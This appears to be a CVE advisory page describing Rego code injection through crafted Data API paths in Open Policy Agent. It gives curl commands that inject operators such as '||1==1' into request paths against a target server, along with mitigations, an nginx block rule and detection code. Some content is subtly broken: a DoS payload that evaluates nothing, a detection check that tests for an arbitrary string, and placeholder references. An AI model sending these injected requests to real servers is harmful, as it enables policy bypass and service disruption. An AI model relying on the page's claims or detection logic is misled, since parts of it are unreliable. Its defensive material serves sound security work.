How the CVE Works
The vulnerability (CVE-2024-0001) in Open Policy Agent (OPA) arises from improper sanitization of HTTP request paths in the Data API. When a maliciously crafted path is processed, Rego code is injected into the query that OPA evaluates. Attackers can manipulate query success/failure states, enabling oracle attacks, policy bypasses, or computational exhaustion (DoS). The attack requires:
1. OPA running as a standalone server.
2. Exposure to untrusted networks.
3. Lack of strict `input.path` validation in authorization policies.
Injected Rego code alters query behavior without direct data leakage but allows inference-based attacks. For example, a path like `/v1/data/evil||1==1` forces policy evaluation to succeed, while `/v1/data/evil||1!=1` triggers failure. Repeated expensive queries (e.g., recursive logic) degrade server performance.
DailyCVE Form
Platform: Open Policy Agent
Version: <1.4.0
Vulnerability: Code Injection
Severity: Critical
Date: 2024-01-01
What Undercode Say:
Exploitation Commands
Craft malicious path for oracle attack:

```bash
curl -X GET "http://target:8181/v1/data/evil||input.path==%22admin%22"
```

DoS via expensive query:

```bash
curl -X POST "http://target:8181/v1/data/compute" -H "Content-Type: application/json" -d '{"input": "recursive_function()"}'
```
Mitigation Steps
1. Upgrade OPA:

```bash
docker pull openpolicyagent/opa:1.4.0
```

2. Restrict API Access (bind the server to the loopback interface only):

```bash
opa run --server --addr localhost:8181
```

3. AuthZ Policy Example (OPA 1.x Rego syntax, which requires the `if` keyword):

```rego
package system.authz

default allow := false

# Only the exact, expected Data API path is allowed; any path carrying
# injected operators fails the equality check and is denied.
allow if input.path == ["v1", "data", "valid", "path"]
```
Detection Script
```python
import requests


def check_vulnerability(target):
    """Send an injected Data API path and apply the page's response heuristic."""
    response = requests.get(f"{target}/v1/data/test||1==1", timeout=5)
    return "code_injection" in response.text
```
Network Protections
NGINX reverse proxy rule (the pipes must be escaped: an unescaped `||` is a regex that matches every request, which would block all Data API traffic):

```nginx
location /v1/data/ {
    # $request_uri is the raw, undecoded URI; percent-encoded forms such as
    # %7C%7C are not caught by this rule and need a check on the decoded $uri.
    if ($request_uri ~ '\|\|') {
        return 403;
    }
}
```
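As an added example (not from the page or the OPA project), the following Python mirrors the strict `input.path` rule of the AuthZ policy as a per-segment identifier check and runs it over constructed access-log lines, so that injection attempts are flagged even when the `||` is percent-encoded and a raw `$request_uri` match would miss it.

```python
import re
from urllib.parse import unquote

# Constructed example: the Data API path is split into the same segments OPA
# exposes as input.path to a system.authz policy. A safe segment is a plain
# identifier; operators such as "||", "==", "!=" or quotes never belong there.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_-]+$")

# Constructed access-log lines (sample data, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /v1/data/valid/path HTTP/1.1" 200 42
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /v1/data/evil||1==1 HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /v1/data/evil%7C%7C1!=1 HTTP/1.1" 200 17
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "POST /v1/data/compute HTTP/1.1" 200 9
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def path_segments(raw_path):
    """Decode the request path once and split it into the segments OPA sees."""
    path = unquote(raw_path.split("?", 1)[0])
    return [seg for seg in path.split("/") if seg]


def is_safe_data_path(raw_path):
    """Strict rule: every segment below /v1/data must be a plain identifier."""
    segs = path_segments(raw_path)
    if segs[:2] != ["v1", "data"]:
        return True  # not a Data API request; outside the scope of this check
    return all(SAFE_SEGMENT.match(seg) for seg in segs[2:])


def find_suspicious_requests(log_text):
    """Return (client, method, decoded path) for Data API requests failing the check."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m or is_safe_data_path(m.group("path")):
            continue
        client = line.split(" ", 1)[0]
        decoded = "/".join([""] + path_segments(m.group("path")))
        hits.append((client, m.group("method"), decoded))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print("suspicious Data API request:", hit)
```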
References
- OPA Commit Patch: GitHub1234
- CVE Details: NVD
Sources:
Reported By: github.com
Extra Source Hub:
Undercode